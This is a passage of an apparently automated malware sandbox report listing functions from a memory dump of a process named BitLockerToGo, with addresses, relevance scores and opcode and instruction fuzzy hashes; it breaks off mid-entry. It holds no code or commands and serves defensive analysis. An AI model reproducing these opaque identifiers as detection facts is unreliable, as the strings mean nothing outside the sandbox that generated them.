                                                                                                                                                                                                              Function 00420F50 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: @vEv
                                                                                                                                                                                                              • API String ID: 0-3729063050
                                                                                                                                                                                                              • Opcode ID: f624b316539e4302f1e960413ea034e0a14242dd65e0855f03b1eef00a3c5446
                                                                                                                                                                                                              • Instruction ID: c7e334dc5a1955d81e2995a774378bd6fd7f03f37499ec234d45d35508b10063
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f624b316539e4302f1e960413ea034e0a14242dd65e0855f03b1eef00a3c5446
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6171FFB07003109BD7209F64DC82B6773B4EFA5358F54452DFA869B3A1E379E904C76A
                                                                                                                                                                                                              Function 00429700 Relevance: 1.5, Strings: 1, Instructions: 240COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: "
                                                                                                                                                                                                              • API String ID: 0-123907689
                                                                                                                                                                                                              • Opcode ID: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
                                                                                                                                                                                                              • Instruction ID: 19cccde6760c41f13b197726376158566d666e76366353ce09bb017b74a89e80
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a3c45a116d1bcfb82e13fe65b12956e147a2fd8ad73a016dda39fbd2ee11f08e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C3710972B183258BD714CE2CD88031FB7E2ABC6720F59852FE49497395D3399D45C78A
                                                                                                                                                                                                              Function 00426578 Relevance: 1.4, Strings: 1, Instructions: 179COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: VgB
                                                                                                                                                                                                              • API String ID: 0-622745292
                                                                                                                                                                                                              • Opcode ID: 06eb299f1e1fbe06f27e03308be1bea417eb84fe81fafd33d7182eb34c649aae
                                                                                                                                                                                                              • Instruction ID: ec0ce4220d91cbe85ef60df19b57f331c9c9a21615ff78bcf4e9ef35e2733c52
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06eb299f1e1fbe06f27e03308be1bea417eb84fe81fafd33d7182eb34c649aae
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A351CEB5508304EBD310CF24D84175BBBE4FBC9314F016E3DE989AB2A0EB759544CB8A
                                                                                                                                                                                                              Function 0043C7C4 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: _Ve;
                                                                                                                                                                                                              • API String ID: 0-1939530796
                                                                                                                                                                                                              • Opcode ID: 5c4316164d995bff05c224b46600ecaf542428b36f61fcb6de5382298520ce92
                                                                                                                                                                                                              • Instruction ID: 8571bfd9b79df5e2348bdad1db6d0e4a85cb5fc2431ebceaf223297aee0cf683
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5c4316164d995bff05c224b46600ecaf542428b36f61fcb6de5382298520ce92
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1441273261C3154BD718DF24C8D127BF7D29BC9344F1AA52ED886A7382E774EA058BC9
                                                                                                                                                                                                              Function 0041ACF9 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID: fa^*
                                                                                                                                                                                                              • API String ID: 0-2308927448
                                                                                                                                                                                                              • Opcode ID: 7f5db9d33a6f91f6449ce6c9f0baa1e0c03c63bccdc9489110fff01d7b47b6aa
                                                                                                                                                                                                              • Instruction ID: 34ee202c90696625c299de2b201d6e9879ab082d62f6678b21e0b88d74ca30e6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f5db9d33a6f91f6449ce6c9f0baa1e0c03c63bccdc9489110fff01d7b47b6aa
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 032187309007008BDB388F24DC41F6277B2AF5231AF28856EE4A75B7E1E7789556C70A
                                                                                                                                                                                                              Function 0041E360 Relevance: .7, Instructions: 707COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: aaa31b096a7d3902f3e7462c98d9f20737f041b597d227528872a84b19d18ca3
                                                                                                                                                                                                              • Instruction ID: 2d06c979aead919ab9054dafd29e0b53d9a9d724b94253469d1519987e6735bd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aaa31b096a7d3902f3e7462c98d9f20737f041b597d227528872a84b19d18ca3
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 356278B0625B009FD368CF39C811797BBE6EF49710F10892EE0AED73A1DB7565018B5A
                                                                                                                                                                                                              Function 0042420E Relevance: .7, Instructions: 691COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: accfb731dfe9ca550f69d533ee1080f9db44e62bb3a37e0444523a9860c9b7b5
                                                                                                                                                                                                              • Instruction ID: faaaa6b2f64a03b6f3011ea3731b741a2996e3d13b67d45522ad672621de7fc8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: accfb731dfe9ca550f69d533ee1080f9db44e62bb3a37e0444523a9860c9b7b5
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4F221776E00226CBCB18CF68D8906BFB3B2FFC9700B5A8169C945AB364DB345D51CB94
                                                                                                                                                                                                              Function 00402F40 Relevance: .7, Instructions: 683COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 751892d1a9fe2a6eed7e12c9ece3295bf5fe85d163a34daf90a3d868f6497a8b
                                                                                                                                                                                                              • Instruction ID: 272705a5ef3e96b50e66b4663cfb3213bfbcaf9de33963063e20083111f61e9e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 751892d1a9fe2a6eed7e12c9ece3295bf5fe85d163a34daf90a3d868f6497a8b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D85204715083459FCB14CF28C0906AABFE1BF89305F18867EF8996B391D778E949CB85
                                                                                                                                                                                                              Function 00406700 Relevance: .7, Instructions: 665COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0a609260ac4c2e4e9b1110b736099aca7d95cd86af4f87d81eb65a723492405d
                                                                                                                                                                                                              • Instruction ID: 47c33411892ceb107c4ecc89153770c7cc167245f06ccd7ca171485fd0e54460
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0a609260ac4c2e4e9b1110b736099aca7d95cd86af4f87d81eb65a723492405d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2752DFB0A08B858FE731CB24C4843A7BBE1AB51314F15493FD5E756BC2C27DA995CB0A
                                                                                                                                                                                                              Function 004074E0 Relevance: .6, Instructions: 625COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 9f7b0bf33a8e7d6c8819c877894f591ccd806664842b40ec063030a01e91efb8
                                                                                                                                                                                                              • Instruction ID: 95044ddbcf0dad1c9763013998ae02806adc2397f01f246e592964cb73f32cbe
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9f7b0bf33a8e7d6c8819c877894f591ccd806664842b40ec063030a01e91efb8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6912D771A0C7118BD724DF18D8806ABB3E1EBC4315F29893ED986A7381D738B955CB87
                                                                                                                                                                                                              Function 004110E0 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8297979c6031e96f4231aba774fe71a62dfd42c5287f976ba3e202eea1ab37b2
                                                                                                                                                                                                              • Instruction ID: 899ab796983557eae41bc007e548b7a90ef6fcd0b1e981d45ecdc633c43c5493
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8297979c6031e96f4231aba774fe71a62dfd42c5287f976ba3e202eea1ab37b2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C532F3B5A04B008FC714EF38D58139ABBF1AF55314F14893ED99A873A1E739E849CB46
                                                                                                                                                                                                              Function 00403970 Relevance: .6, Instructions: 600COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1c478c49f37e52bcc17f030f708eeb8f616ff65162a56a909fba1a35cc4edcea
                                                                                                                                                                                                              • Instruction ID: 0f89ef32d9a73000ee9b5c68ea2da4659140d6f19473053088ecb18adc480563
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1c478c49f37e52bcc17f030f708eeb8f616ff65162a56a909fba1a35cc4edcea
                                                                                                                                                                                                              • Instruction Fuzzy Hash: CA3234B0914B118FC328CF29C680526BBF5BF85711B604A2ED697A7F90D73AF945CB18
                                                                                                                                                                                                              Function 00437910 Relevance: .5, Instructions: 513COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a888203b8af88fc571d83bc66d742a1c0ea0dbbdaa3217ad51ca85bf48728854
                                                                                                                                                                                                              • Instruction ID: c5b6a1f5779748a317148d601c19545443c760b444b1976fe76480b01f6ef5ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a888203b8af88fc571d83bc66d742a1c0ea0dbbdaa3217ad51ca85bf48728854
                                                                                                                                                                                                              • Instruction Fuzzy Hash: FDF113726082148BD738DF14C88267FB7A2EB88714F15A53EE9C657391DB38ED0587CA
                                                                                                                                                                                                              Function 00405980 Relevance: .4, Instructions: 448COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                                                                                                                                              • Instruction ID: a1ca46f738caa1c15e883347c6b06f5eabc36dcbcbf2f060ad67318dd3bcd0bc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05210ab14592169525e76f698fe40e0322417d452b96810df3ed72334fa87ebf
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DAF1CC356087418FD724CF29C88066BFBE2EFD9304F08882EE5D597391E639E945CB96
                                                                                                                                                                                                              Function 00421220 Relevance: .4, Instructions: 446COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cdfb884de620e024f71f25dc452354990fa40783a3ddab29937daa446b7458a8
                                                                                                                                                                                                              • Instruction ID: ca8a3d5ab081b0e9f7fcf1b98d59b6aa013fdcde5d37efa5f8aaa0ec050d5076
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cdfb884de620e024f71f25dc452354990fa40783a3ddab29937daa446b7458a8
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 05C13572A043209BD710DF28D84277BB3E1EFA4354F49952DE886973A1F738E945839A
                                                                                                                                                                                                              Function 00445D2A Relevance: .4, Instructions: 390COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 89761899fdcd5bbf010a814062f086fdcc676d2c9f40afabd63fc75ed55a7ab4
                                                                                                                                                                                                              • Instruction ID: 0e481ca79685c8c9c511c99b322e06c2f8bf8bc3be077fb3bec636c30ccfcea0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 89761899fdcd5bbf010a814062f086fdcc676d2c9f40afabd63fc75ed55a7ab4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BD1375988D3C56FDB528A700CE94D6BF68ED1312035896EFDCD64A487D70CA20FE726
                                                                                                                                                                                                              Function 00424690 Relevance: .4, Instructions: 374COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: cce8e4b512898664201523a09bafce5068197cb2e82f619fbdc25e15211de2c4
                                                                                                                                                                                                              • Instruction ID: e14a337cb59f73f4eb96b3197ce793777e5d498d0cb7cd75f49a751dbb57fa3e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cce8e4b512898664201523a09bafce5068197cb2e82f619fbdc25e15211de2c4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 64A1143AE002248BCB28CFA8E851BAEB7B2FF89300F56416DD945B7351D7396D51CB84
                                                                                                                                                                                                              Function 00426B09 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: ff89cd7481519196bfd7edadc3bc1243657998fc0abde34e41e9d5a5b2764abb
                                                                                                                                                                                                              • Instruction ID: a0447cd09e6e8f4f002edc290cdf2f2efc31a9c7ba8c268c6ca938ca7010d7ed
                                                                                                                                                                                                              • Opcode Fuzzy Hash: ff89cd7481519196bfd7edadc3bc1243657998fc0abde34e41e9d5a5b2764abb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 66D1F075608291CFD7148F29E81132BBBE2BFC6320F1A8AADE4A1972E1D735D940CB45
                                                                                                                                                                                                              Function 0041C850 Relevance: .3, Instructions: 337COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 29a1067eea8e227af260fdf25b867c6e35937d5963c3d30cffd22b6def3b242c
                                                                                                                                                                                                              • Instruction ID: c44e9ddbf9b2512b793fb5ffbe277914e5cda94946df6dec4b18f3ae91943e1b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29a1067eea8e227af260fdf25b867c6e35937d5963c3d30cffd22b6def3b242c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2CB14875944301AFD7219F24DC81B6ABBE1FFC8368F144A2EF898932E0D7359C598B46
                                                                                                                                                                                                              Function 0043DF30 Relevance: .3, Instructions: 331COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: InitializeThunk
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2994545307-0
                                                                                                                                                                                                              • Opcode ID: 81f72856bbb47050cb0d1f5562e10f568441e2186a78c190d2939d4288837af4
                                                                                                                                                                                                              • Instruction ID: cd195e56b245e86e4f1a4827f1511509cfbc0d11c149cffb59f42c62929c843f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 81f72856bbb47050cb0d1f5562e10f568441e2186a78c190d2939d4288837af4
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 32A13232B053219BD7248F19D88076BB3E2FFC8310F19A52DE9859B3A4DB79AC51C785
                                                                                                                                                                                                              Function 00406270 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 0fb82c8f41fe862e8f5f2d549d2e08dc1927388a173b0262696c8ba9cb2b7a2b
                                                                                                                                                                                                              • Instruction ID: 2022bbf19441b8f94a73070f535634fd4a70d08abb736e01ef997c90f7ddb05b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fb82c8f41fe862e8f5f2d549d2e08dc1927388a173b0262696c8ba9cb2b7a2b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19C15CB29087418FC360CF28DC96BABB7E1BF85318F09492DD1DAD6342D778A155CB46
                                                                                                                                                                                                              Function 0042A742 Relevance: .3, Instructions: 298COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f7cb5e740af0763ae4ad8cd122f8ad3bea70a41f73439cb703f866134083ea8a
                                                                                                                                                                                                              • Instruction ID: 4c6ce0761b6d960950cfffb437402114a419437165ccd67c5dc7a314ec07d1d6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cb5e740af0763ae4ad8cd122f8ad3bea70a41f73439cb703f866134083ea8a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 78819B72B0836047D32C8F39C861377BBD29FD6300F19896EEDD69B395DA3988058746
                                                                                                                                                                                                              Function 0042A855 Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 62f196445c551d915e9875b9c3c787f56a2898d18b8b166ddce61da84134318f
                                                                                                                                                                                                              • Instruction ID: a6a6e12ccf1f1edaa7db106d9392e4e1593eaf584362187802091c4455a2c7ae
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 62f196445c551d915e9875b9c3c787f56a2898d18b8b166ddce61da84134318f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3581BD72B0836047D32C8B39D861377BBD29FD6300F19896EDDD69B395DA3D88058346
                                                                                                                                                                                                              Function 0042406D Relevance: .3, Instructions: 294COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 8f30f38bed6b30110620228f027c5e55c9ee344176152f37456ceead2c944241
                                                                                                                                                                                                              • Instruction ID: a452e189543b328afc5c947086a31a41054aabf9733da30c5f5ff15ad50dbe88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f30f38bed6b30110620228f027c5e55c9ee344176152f37456ceead2c944241
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6081363AE00225CBCB28CFA8E8517AEB7B2FF89300F55416DD945A7391DB396D51CB84
                                                                                                                                                                                                              Function 0042A7BC Relevance: .3, Instructions: 293COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000003.00000002.2454783758.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: f8be971a025f9ea4dad753c0a0104c709968f2747e4de7bbcc45472c5bbdfb8e
                                                                                                                                                                                                              • Instruction ID: b44bb235da679b9d4976e93abef0c9d536c2a5bc5a3fd45c74a1b1645caa880f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8be971a025f9ea4dad753c0a0104c709968f2747e4de7bbcc45472c5bbdfb8e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F81BCB2B0836047D32C8B398861377BBD29FD2300F198A6EDDD69B395DA3D88058346
                                                                                                                                                                                                              Function 0042A7AD Relevance: .3, Instructions: 266COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              Memory Dump Source
